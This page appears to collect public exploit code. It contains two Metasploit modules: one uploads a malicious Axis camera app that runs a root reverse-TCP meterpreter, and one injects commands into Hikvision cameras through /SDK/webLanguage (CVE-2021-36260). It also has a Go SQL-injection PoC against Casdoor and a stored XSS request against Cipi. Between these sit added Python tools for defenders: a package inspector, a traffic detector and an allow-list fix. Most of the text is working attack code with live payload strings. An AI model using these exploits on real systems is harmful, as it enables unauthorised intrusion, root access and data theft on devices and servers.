<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Axis IP Camera Application Upload',<br /> 'Description' => %q{<br /> This module exploits the "Apps" feature in Axis IP cameras. The feature allows third party<br /> developers to upload and execute 'eap' applications on the device. The system does not validate<br /> the application comes from a trusted source, so a malicious attacker can upload and execute<br /> arbitrary code. The issue has no CVE, although the technique was made public in 2018.<br /><br /> This module uploads and executes stageless meterpreter as `root`. Uploading the application<br /> requires valid credentials. 
The default administrator credentials used to be `root:root` but<br /> newer firmware versions force users to provide a new password for the `root` user.<br /><br /> The module was tested on an Axis M3044-V using the latest firmware (9.80.3.8: December 2021),<br /> although all models that support the "Apps" feature are presumed to be vulnerable.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'jbaines-r7' # Discovery and Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://www.tenable.com/blog/tenable-research-advisory-axis-camera-app-malicious-package-distribution-weakness'],<br /> [ 'URL', 'https://www.axis.com/support/developer-support/axis-camera-application-platform']<br /> ],<br /> 'DisclosureDate' => '2018-04-12',<br /> 'Platform' => ['linux'],<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Type' => :linux_dropper,<br /> 'Payload' => {<br /> },<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' # Use stageless payloads until issue 16107 gets addressed to fix the ARMLE stager<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 80,<br /> 'SSL' => false<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/']),<br /> OptString.new('USERNAME', [true, 'The username to authenticate with', 'root']),<br /> OptString.new('PASSWORD', [true, 'The password to authenticate with', 'root'])<br /> ])<br /> end<br /><br /> # Check function will attempt to verify:<br /> #<br /> # 1. The provided credentials work for authentication<br /> # 2. The remote target is an Axis camera<br /> # 3. 
The applications API exists.<br /> #<br /> def check<br /> # grab the brand/model. Shouldn't require authentication.<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/axis-cgi/prod_brand_info/getbrand.cgi')<br /> })<br /><br /> return CheckCode::Unknown unless res && (res.code == 200)<br /><br /> body_json = res.get_json_document<br /> return CheckCode::Unknown if body_json.empty? || body_json.dig('Brand', 'ProdShortName').nil?<br /><br /> # The brand / model are now known<br /> check_comment = "The target reports itself to be a '#{body_json.dig('Brand', 'ProdShortName')}'."<br /><br /> # check to see if the applications api exists (also tests credentials)<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'username' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD'],<br /> 'uri' => normalize_uri(target_uri.path, '/axis-cgi/applications/list.cgi')<br /> })<br /><br /> # A strange edge case where there is no response... respond detected<br /> return CheckCode::Detected unless res<br /> # Respond safe if credentials fail, to prevent the exploit from running<br /> return CheckCode::Safe('The user provided credentials did not work.') if res.code == 401<br /> # Assume any non-200 means the API doesn't exist<br /> return CheckCode::Safe(check_comment) if res.code != 200<br /><br /> # This checks for an XML response which I'm not sure is smart considering most of the device<br /> # does JSON replies... the concern being that this response has changed in newer models.<br /> # include? returns a boolean, so it is used directly as the guard (comparing it to a status<br /> # code would always be true and the Safe branch could never be reached).<br /> return CheckCode::Safe(check_comment) unless res.body.include?('<reply result="ok">')<br /><br /> CheckCode::Appears(check_comment)<br /> end<br /><br /> # Creates a malicious "eap" application. The package application will gain execution<br /> # through the postinstall script. The script, which executes as a systemd oneshot, will<br /> # create and execute a new service for the payload. 
We have to do this because the oneshot<br /> # child processes will be terminated when the main binary exits. Executing the payload from<br /> # a new service gets around that issue.<br /> #<br /> # The eap registers as a "lua" apptype, because the binary version (armv7hf) gets checked<br /> # for some required libraries whereas the lua version is just accepted.<br /> #<br /> # The construction of the eap follows this pattern:<br /> # * tar -cf exploit payload package.conf postinstall.sh payload.service<br /> # * gzip exploit<br /> # * mv exploit.gz exploit.eap<br /> def create_eap(payload, appname)<br /> print_status("Creating an application package named: #{appname}")<br /> script_name = "#{Rex::Text.rand_text_alpha_lower(3..8)}.sh"<br /><br /> package_conf = "PACKAGENAME='#{Rex::Text.rand_text_alpha(4..14)}'\n" \<br /> "APPTYPE='lua'\n" \<br /> "APPNAME='#{appname}'\n" \<br /> "APPID='48#{Rex::Text.rand_text_numeric(3)}'\n" \<br /> "APPMAJORVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \<br /> "APPMINORVERSION='#{Rex::Text.rand_text_numeric(1..2)}'\n" \<br /> "APPMICROVERSION='#{Rex::Text.rand_text_numeric(1..3)}'\n" \<br /> "APPGRP='root'\n" \<br /> "APPUSR='root'\n" \<br /> "POSTINSTALLSCRIPT='#{script_name}'\n" \<br /> "STARTMODE='respawn'\n"<br /><br /> # this sync, sleep, cp, sleep pattern is not optimal, but the underlying<br /> # filesystem was taking time to catch up to the exploit (and mounting and<br /> # unmounting itself which is just weird) and this seemed like a reasonable,<br /> # if not hacky, way to give it a chance to catch up. Seems to work well.<br /> start_service =<br /> "#!/bin/sh\n"\<br /> "\nsync\n"\<br /> "\nsleep 2\n"\<br /> "\ncp ./#{appname}.service /etc/systemd/system/\n" \<br /> "\nsleep 2\n"\<br /> "\nsystemctl start #{appname}\n"<br /><br /> # only register the service file for deletion. 
Everything else will be<br /> # deleted by the uninstall function called later.<br /> register_file_for_cleanup("/etc/systemd/system/#{appname}.service")<br /><br /> service =<br /> "[Unit]\n"\<br /> "Description=\n"\<br /> "[Service]\n"\<br /> "Type=simple\n"\<br /> "User=root\n"\<br /> "ExecStart=/usr/local/packages/#{appname}/#{appname}\n"\<br /> "\n"\<br /> "[Install]\n"\<br /> "WantedBy=multi-user.target\n"<br /><br /> tarfile = StringIO.new<br /> Rex::Tar::Writer.new tarfile do |tar|<br /> tar.add_file('package.conf', 0o644) do |io|<br /> io.write package_conf<br /> end<br /> tar.add_file(script_name.to_s, 0o755) do |io|<br /> io.write start_service<br /> end<br /> tar.add_file(appname.to_s, 0o755) do |io|<br /> io.write payload<br /> end<br /> tar.add_file("#{appname}.service", 0o644) do |io|<br /> io.write service<br /> end<br /> end<br /> tarfile.rewind<br /> tarfile.close<br /><br /> Rex::Text.gzip(tarfile.string)<br /> end<br /><br /> # Upload the malicious EAP application for a root shell. 
Always attempt to uninstall the application<br /> def exploit<br /> appname = Rex::Text.rand_text_alpha_lower(3)<br /> eap = create_eap(payload.encoded, appname)<br /><br /> # Instruct the application to install the constructed EAP<br /> multipart_form = Rex::MIME::Message.new<br /> multipart_form.add_part('{"apiVersion":"1.0","method":"install"}', 'application/json', nil, 'form-data; name="data"; filename="blob"')<br /> multipart_form.add_part(eap, 'application/octet-stream', 'binary', "form-data; name=\"fileData\"; filename=\"#{appname}.eap\"")<br /><br /> install_endpoint = normalize_uri(target_uri.path, '/axis-cgi/packagemanager.cgi')<br /> print_status("Sending an application upload request to #{install_endpoint}")<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'username' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD'],<br /> 'uri' => install_endpoint,<br /> 'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",<br /> 'data' => multipart_form.to_s<br /> })<br /><br /> # check for successful installation<br /> fail_with(Failure::Disconnected, 'Connection failed') unless res<br /> fail_with(Failure::UnexpectedReply, "HTTP status code is not 200 OK: #{res.code}") unless res.code == 200<br /> body_json = res.get_json_document<br /> fail_with(Failure::UnexpectedReply, 'Missing JSON response') if body_json.empty?<br /> # {"apiVersion"=>"1.4", "method"=>"install", "error"=>{"code"=>60, "message"=>"Failed to install acap"}}<br /> fail_with(Failure::UnexpectedReply, 'The target responded with a JSON error') unless body_json['error'].nil?<br /><br /> # syncing the unstaged meterpreter payload seems to take a little bit for the poor little<br /> # embedded filesystem. Give it a chance to sync up before we try to remove the application.<br /> print_good('Application installed. 
Pausing 5 seconds to let the filesystem sync.')<br /> sleep(5)<br /> ensure<br /> uninstall_endpoint = normalize_uri(target_uri.path, '/axis-cgi/applications/control.cgi')<br /> print_status("Sending a delete application request to #{uninstall_endpoint}")<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'username' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD'],<br /> 'uri' => uninstall_endpoint,<br /> 'vars_get' => {<br /> 'action' => 'remove',<br /> 'package' => appname.to_s<br /> }<br /> })<br /><br /> # instructions for manual removal if the above fails. That should never happen, but best be safe.<br /> removal_instructions = 'To manually remove the application, log in to the system and then select the apps tab. ' \<br /> "Find the app named '#{appname}' and select it. Click the trash bin icon to uninstall it."<br /><br /> # check for successful removal. The cases are exclusive, so a nil response is never<br /> # dereferenced and success is only reported when the reply actually looks like success.<br /> if res.nil?<br /> print_bad("The server did not respond to the application deletion request. #{removal_instructions}")<br /> elsif res.code != 200<br /> print_bad("The server did not respond with 200 OK to the application deletion request. #{removal_instructions}")<br /> elsif !res.body.include?('OK')<br /> print_bad("The application deletion response did not contain the expected body. #{removal_instructions}")<br /> else<br /> print_good("The application #{appname} was successfully removed from the target!")<br /> end<br /> end<br />end<br /></code></pre>
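The comment above `create_eap` spells out the layout of an application package (a gzipped tar holding `package.conf`, a post-install script, the main file and a systemd unit) and the properties that make it dangerous: it runs as `root`, it declares itself a `lua` app so the binary is not checked, and its post-install script installs a service. The following inspector is an added example for the reviewing side, not Axis's or the module's code: it builds a constructed package of the same shape (placeholder contents, not a payload), parses `package.conf` using the key names shown in the module, and reports the traits a defender reviewing an uploaded `.eap` would want flagged. The ELF-magic heuristic for "lua app whose main file is really a binary" is an assumption of this example.

```python
import gzip
import io
import tarfile
from typing import Dict, List


def build_sample_eap() -> bytes:
    """Constructed package in the layout the module's comment describes:
    tar of package.conf, post-install script, main file, unit file; then gzip.
    All contents are placeholders, not a working application."""
    package_conf = (
        "PACKAGENAME='sample'\nAPPTYPE='lua'\nAPPNAME='abc'\nAPPID='48123'\n"
        "APPMAJORVERSION='1'\nAPPMINORVERSION='0'\nAPPMICROVERSION='1'\n"
        "APPGRP='root'\nAPPUSR='root'\nPOSTINSTALLSCRIPT='setup.sh'\nSTARTMODE='respawn'\n"
    )
    files = {
        "package.conf": package_conf.encode(),
        "setup.sh": b"#!/bin/sh\ncp ./abc.service /etc/systemd/system/\nsystemctl start abc\n",
        # Main file declared as a lua app but carrying ELF magic (placeholder bytes after it).
        "abc": b"\x7fELF" + b"placeholder-not-a-real-binary",
        "abc.service": b"[Unit]\n[Service]\nExecStart=/usr/local/packages/abc/abc\n",
    }
    raw = io.BytesIO()
    with tarfile.open(fileobj=raw, mode="w") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return gzip.compress(raw.getvalue())


def parse_package_conf(text: str) -> Dict[str, str]:
    """Parse KEY='value' lines into a dict (quotes stripped, comments ignored)."""
    conf: Dict[str, str] = {}
    for line in text.splitlines():
        if "=" in line and not line.lstrip().startswith("#"):
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip().strip("'\"")
    return conf


def review_eap(blob: bytes) -> List[str]:
    """Return human-readable findings about a gzipped-tar application package."""
    findings: List[str] = []
    with tarfile.open(fileobj=io.BytesIO(gzip.decompress(blob)), mode="r") as tar:
        members = {m.name: m for m in tar.getmembers() if m.isfile()}
        if "package.conf" not in members:
            return ["no package.conf: not a valid application package"]
        conf = parse_package_conf(tar.extractfile(members["package.conf"]).read().decode())

        if conf.get("APPUSR") == "root" or conf.get("APPGRP") == "root":
            findings.append("runs as root (APPUSR/APPGRP)")

        script = conf.get("POSTINSTALLSCRIPT")
        if script:
            findings.append(f"post-install script present: {script}")
            if script in members:
                body = tar.extractfile(members[script]).read().decode(errors="replace")
                if "systemctl" in body or "/etc/systemd/" in body:
                    findings.append("post-install script touches systemd")

        units = sorted(n for n in members if n.endswith(".service"))
        if units:
            findings.append(f"bundles systemd unit file(s): {', '.join(units)}")

        main = conf.get("APPNAME")
        if conf.get("APPTYPE") == "lua" and main in members:
            head = tar.extractfile(members[main]).read(4)
            if head == b"\x7fELF":  # heuristic: a lua app should not ship an ELF main file
                findings.append("APPTYPE is lua but the main file is an ELF binary")
    return findings


if __name__ == "__main__":
    for finding in review_eap(build_sample_eap()):
        print("[!]", finding)
```

Every finding here is visible from the package alone, before anything is installed, which is the point at which an upload gate or an internal package review can still refuse it.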
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Hikvision IP Camera Unauthenticated Command Injection',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection in a variety of Hikvision IP<br /> cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an<br /> HTTP PUT request sent to the `/SDK/webLanguage` endpoint, resulting in command execution<br /> as the `root` user.<br /><br /> This module specifically attempts to exploit the blind variant of the attack. The module<br /> was successfully tested against an HWI-B120-D/W using firmware V5.5.101 build 200408. 
It<br /> was also tested against an unaffected DS-2CD2142FWD-I using firmware V5.5.0 build 170725.<br /> Please see the Hikvision advisory for a full list of affected products.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Watchful_IP', # Vulnerability discovery and disclosure<br /> 'bashis', # Proof of concept<br /> 'jbaines-r7' # Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2021-36260' ],<br /> [ 'URL', 'https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html'],<br /> [ 'URL', 'https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/security-notification-command-injection-vulnerability-in-some-hikvision-products/'],<br /> [ 'URL', 'https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py']<br /> ],<br /> 'DisclosureDate' => '2021-09-18',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_ARMLE],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> # the target has very limited payload targets and a tight payload space.<br /> # bind_busybox_telnetd might be *the only* one.<br /> 'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd',<br /> # saving four bytes of payload space by using 'sh' instead of '/bin/sh'<br /> 'LOGIN_CMD' => 'sh',<br /> 'Space' => 23<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'printf', 'echo' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 80,<br /> 'SSL' => false,<br /> 'MeterpreterTryToFork' => true<br /> },<br /> 'Notes' => {<br /> 
'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> # Check will test two things:<br /> # 1. Is the endpoint a Hikvision camera?<br /> # 2. Does the endpoint respond as expected to exploitation? This module is<br /> # specifically testing for the blind variant of this attack so we key off<br /> # of the returned HTTP status code. The developer's test target responded<br /> # to exploitation with a 500. Notes from bashis' exploit indicate that<br /> # they saw targets respond with 200 as well, so we'll accept that also.<br /> def check<br /> # Hikvision landing page redirects to '/doc/page/login.asp' via JavaScript:<br /> # <script><br /> # window.location.href = "/doc/page/login.asp?_" + (new Date()).getTime();<br /> # </script><br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/')<br /> })<br /> return CheckCode::Unknown("Didn't receive a response from the target.") unless res<br /> return CheckCode::Safe('The target did not respond with a 200 OK') unless res.code == 200<br /> return CheckCode::Safe('The target doesn\'t appear to be a Hikvision device') unless res.body.include?('/doc/page/login.asp?_')<br /><br /> payload = '<xml><language>$(cat /proc/cpuinfo)</language></xml>'<br /> res = send_request_cgi({<br /> 'method' => 'PUT',<br /> 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),<br /> 'data' => payload<br /> })<br /><br /> return CheckCode::Unknown("Didn't receive a response from the target.") unless res<br /> return CheckCode::Safe('The target did not respond with a 200 OK or 500 error') unless (res.code == 200 || res.code == 500)<br /><br /> # Some cameras are not vulnerable and still respond 500. 
We can weed them out by making<br /> # the remote target sleep and use a low timeout. This might not be good for high latency targets<br /> # or for people using Metasploit as a vulnerability scanner... but it's better than flagging all<br /> # 500 responses as vulnerable.<br /> payload = '<xml><language>$(sleep 20)</language></xml>'<br /> res = send_request_cgi({<br /> 'method' => 'PUT',<br /> 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),<br /> 'data' => payload<br /> }, 10)<br /><br /> return CheckCode::Appears('It appears the target executed the provided sleep command.') unless res<br /><br /> CheckCode::Safe('The target did not execute the provided sleep command.')<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # The injection space is very small. The entire snprintf is 0x1f bytes and the<br /> # format string is:<br /> #<br /> # /dav/%s.tar.gz<br /> #<br /> # Which accounts for 12 bytes, leaving only 19 bytes for our payload. Fortunately,<br /> # snprintf will let us reclaim '.tar.gz' so in reality, there are 26 bytes for<br /> # our payload. We need 3 bytes to invoke our injection: $(). Leaving 23 bytes<br /> # for payload. The 'echo' stager has a minimum of 26 bytes but we obviously don't<br /> # have that much space. We can steal the extra space from the "random" file name<br /> # and compress ' >> ' to '>>'. That will get us below 23. 
Squeezing the extra<br /> # bytes will also allow printf stager to do more than 1 byte per exploitation.<br /> cmd = cmd.gsub(%r{tmp/[0-9a-zA-Z]+}, @fname)<br /> cmd = cmd.gsub(/ >/, '>')<br /> cmd = cmd.gsub(/> /, '>')<br /><br /> payload = "<xml><language>$(#{cmd})</language></xml>"<br /> res = send_request_cgi({<br /> 'method' => 'PUT',<br /> 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),<br /> 'data' => payload<br /> })<br /><br /> fail_with(Failure::Disconnected, 'Connection failed') unless res<br /> fail_with(Failure::UnexpectedReply, "HTTP status code is not 200 or 500: #{res.code}") unless (res.code == 200 || res.code == 500)<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /><br /> # generate a random value for the tmp file name. See execute_command for details<br /> @fname = "tmp/#{Rex::Text.rand_text_alpha(1)}"<br /><br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> # 26 is technically a lie. See `execute_command` for additional insight<br /> execute_cmdstager(linemax: 26)<br /> end<br /> end<br />end<br /></code></pre>
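The module's `check` and `execute_command` describe exactly what CVE-2021-36260 traffic looks like on the wire: an unauthenticated `PUT` to `/SDK/webLanguage` whose `<language>` element carries `$(...)` command substitution, with a `sleep` inside the substitution as the blind, time-based probe. That is enough to write detection logic for a proxy, WAF or packet capture sitting in front of the camera. The following is an added example (not part of the module): it classifies constructed request records (the record shape, a dict with `src`, `method`, `path` and `body`, is an assumption of this example) and names the sources that should raise an alert.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample traffic, not captured from a real device. Each record is a request
# that a reverse proxy or WAF in front of the camera could have recorded; the
# /SDK/webLanguage bodies mirror the shapes the module sends.
SAMPLE_REQUESTS: List[Dict[str, str]] = [
    {"src": "10.0.0.5", "method": "GET", "path": "/doc/page/login.asp?_=1645000000", "body": ""},
    {"src": "10.0.0.9", "method": "PUT", "path": "/SDK/webLanguage",
     "body": "<xml><language>$(cat /proc/cpuinfo)</language></xml>"},
    {"src": "10.0.0.9", "method": "PUT", "path": "/SDK/webLanguage",
     "body": "<xml><language>$(sleep 20)</language></xml>"},
    {"src": "10.0.0.7", "method": "PUT", "path": "/SDK/webLanguage",
     "body": "<xml><language>en</language></xml>"},
]

# A legitimate language selection is a short language tag; nothing else belongs there.
LANGUAGE_TAG = re.compile(r"^[A-Za-z]{2,8}(?:[-_][A-Za-z0-9]{2,8})?$")
# Shell substitution and chaining syntax that has no place in a language code.
SHELL_META = re.compile(r"\$\(|`|;|\||&&|\$\{")
LANGUAGE_ELEMENT = re.compile(r"<language>(.*?)</language>", re.DOTALL)


def language_value(body: str) -> Optional[str]:
    """Return the text inside <language>...</language>, or None if the element is absent."""
    m = LANGUAGE_ELEMENT.search(body)
    return m.group(1) if m else None


def classify(req: Dict[str, str]) -> Optional[str]:
    """Classify one request; None means it never touched the vulnerable endpoint."""
    if req["method"].upper() != "PUT" or req["path"].split("?", 1)[0] != "/SDK/webLanguage":
        return None
    value = language_value(req["body"])
    if value is None:
        return "malformed"            # no <language> element: not a normal client
    if LANGUAGE_TAG.match(value):
        return "benign"
    if SHELL_META.search(value):
        # A sleep inside the substitution is the blind timing probe the module's check uses.
        return "timing_probe" if re.search(r"\bsleep\b", value) else "injection"
    return "suspicious"               # not a language tag, but no obvious shell syntax


def scan(requests: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(source, verdict) for every request that reached /SDK/webLanguage."""
    findings = []
    for req in requests:
        verdict = classify(req)
        if verdict is not None:
            findings.append((req["src"], verdict))
    return findings


def offending_sources(requests: List[Dict[str, str]]) -> List[str]:
    """Sources that sent at least one injection or timing probe, in first-seen order."""
    seen: List[str] = []
    for src, verdict in scan(requests):
        if verdict in ("injection", "timing_probe") and src not in seen:
            seen.append(src)
    return seen


if __name__ == "__main__":
    for src, verdict in scan(SAMPLE_REQUESTS):
        print(f"{src:12} {verdict}")
    print("alert on:", offending_sources(SAMPLE_REQUESTS))
```

Because the attack is unauthenticated and the endpoint has a single legitimate purpose, a strict positive model of the value (a language tag) is more robust than the metacharacter list alone; the list is kept only to separate "injection" from merely "suspicious" for triage.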
<pre><code>// Exploit Title: Casdoor 1.13.0 SQL Injection (Unauthenticated) <br />// Date: 2022-02-25<br />// Exploit Author: Mayank Deshmukh<br />// Vendor Homepage: https://casdoor.org/<br />// Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0<br />// Version: version < 1.13.1<br />// Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r<br />// Tested on: Kali Linux<br />// CVE : CVE-2022-24124<br />// Github POC: https://github.com/ColdFusionX/CVE-2022-24124<br /><br />// Exploit Usage : go run exploit.go -u http://127.0.0.1:8080<br /><br />package main<br /><br />import (<br /> "flag"<br /> "fmt"<br /> "html"<br /> "io/ioutil"<br /> "net/http"<br /> "os"<br /> "regexp"<br /> "strings"<br />)<br /><br />func main() {<br /> var url string<br /> flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)")<br /> flag.Parse()<br /><br /> banner := `<br />-=Casdoor SQL Injection (CVE-2022-24124)=- <br />- by Mayank Deshmukh (ColdFusionX)<br /><br />`<br /> fmt.Printf(banner)<br /> fmt.Println("[*] Dumping Database Version")<br /> response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)")<br /><br /> if err != nil {<br /> panic(err)<br /> }<br /><br /> defer response.Body.Close()<br /><br /> databytes, err := ioutil.ReadAll(response.Body)<br /><br /> if err != nil {<br /> panic(err)<br /> }<br /><br /> content := string(databytes)<br /><br /> re := regexp.MustCompile("(?i)(XPATH syntax error.*&#39)")<br /><br /> result := re.FindAllString(content, -1)<br /> <br /> sqliop := fmt.Sprint(result)<br /> replacer := strings.NewReplacer("[", "", "]", "", "&#39", "", ";", "")<br /> <br /> finalop := replacer.Replace(sqliop)<br /> fmt.Println(html.UnescapeString(finalop))<br /><br /><br /> if result == nil {<br /> fmt.Printf("Application not vulnerable\n")<br /> os.Exit(1)<br /> }<br /><br />}<br /></code></pre>
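The Casdoor request above puts a SQL expression into the `field` query parameter, i.e. the name of the column the API filters on, and the database evaluates it. Column names cannot be bound as query parameters, so the only sound fix is to map the client-supplied field name through an allow-list and never splice the raw string into SQL. The following is an added example of that pattern, not Casdoor's code: it models the vulnerable builder beside the hardened one on an in-memory SQLite table (Casdoor runs on a different stack; the table, column names and the `sqlite_version()` probe are constructed for this example).

```python
import sqlite3
from typing import List

# Fields the API accepts, mapped to the real column names. The keys are the public
# surface; only the values ever reach SQL.
ALLOWED_FIELDS = {
    "name": "name",
    "displayName": "display_name",
    "createdTime": "created_time",
}


def vulnerable_filter_query(field: str) -> str:
    """The pattern behind CVE-2022-24124: a caller-controlled column name spliced into SQL.
    The filter value is still bound as a parameter, which is why the column name is the weak spot."""
    return f"SELECT name FROM organization WHERE {field} LIKE ? ORDER BY name"


def safe_filter_query(field: str) -> str:
    """Hardened form: the field must be a known key; only the mapped identifier is emitted."""
    column = ALLOWED_FIELDS.get(field)
    if column is None:
        raise ValueError(f"unsupported filter field: {field!r}")
    return f'SELECT name FROM organization WHERE "{column}" LIKE ? ORDER BY name'


def run(conn: sqlite3.Connection, sql: str, value: str) -> List[str]:
    """Execute a filter query with the LIKE value bound as a parameter."""
    return [row[0] for row in conn.execute(sql, (f"%{value}%",))]


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for an organizations table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE organization (name TEXT, display_name TEXT, created_time TEXT)")
    conn.executemany(
        "INSERT INTO organization VALUES (?, ?, ?)",
        [("built-in", "Built-in Organization", "2022-01-01"),
         ("cfx-lab", "CFX Lab", "2022-02-01")],
    )
    return conn


def demo() -> dict:
    conn = build_demo_db()
    # A "field" that is really an expression. The vulnerable builder evaluates it, so the
    # caller learns something about the engine (every SQLite version matches '%3.%'):
    # the same class of inference the advisory's updatexml() error leak exploits.
    probe = "(SELECT sqlite_version())"
    leaked = run(conn, vulnerable_filter_query(probe), "3.")
    try:
        safe_filter_query(probe)
        rejected = False
    except ValueError:
        rejected = True
    legit = run(conn, safe_filter_query("displayName"), "CFX")
    return {"vulnerable_rows": len(leaked), "rejected": rejected, "legit": legit}


if __name__ == "__main__":
    print(demo())
```

The same treatment applies to `sortField` and `sortOrder` in the URL: an `ORDER BY` column is an identifier too, so it goes through the allow-list, and the direction is normalised to a fixed `ASC`/`DESC` rather than echoed.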
<pre><code># Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)<br /># Date: 24.02.2022<br /># Exploit Author: Fikrat Ghuliev (Ghuliev)<br /># Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/><br /># Software Link: https://cipi.sh/ <https://www.aapanel.com/><br /># Version: 3.1.15<br /># Tested on: Ubuntu<br /><br />When the user adds a new server on the "Server" panel, the "name"<br />parameter is not filtered in any way.<br /><br />POST /api/servers HTTP/1.1<br />Host: IP<br />Content-Length: 102<br />Accept: application/json<br />X-Requested-With: XMLHttpRequest<br />Authorization: Bearer<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36<br />Content-Type: application/json<br />Origin: http://IP<br />Referer: http://IP/servers<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />{<br />"name":"\"><script>alert(1337)</script>",<br />"ip":"10.10.10.10",<br />"provider":"local",<br />"location":"xss test"<br />}<br /><br /></code></pre>
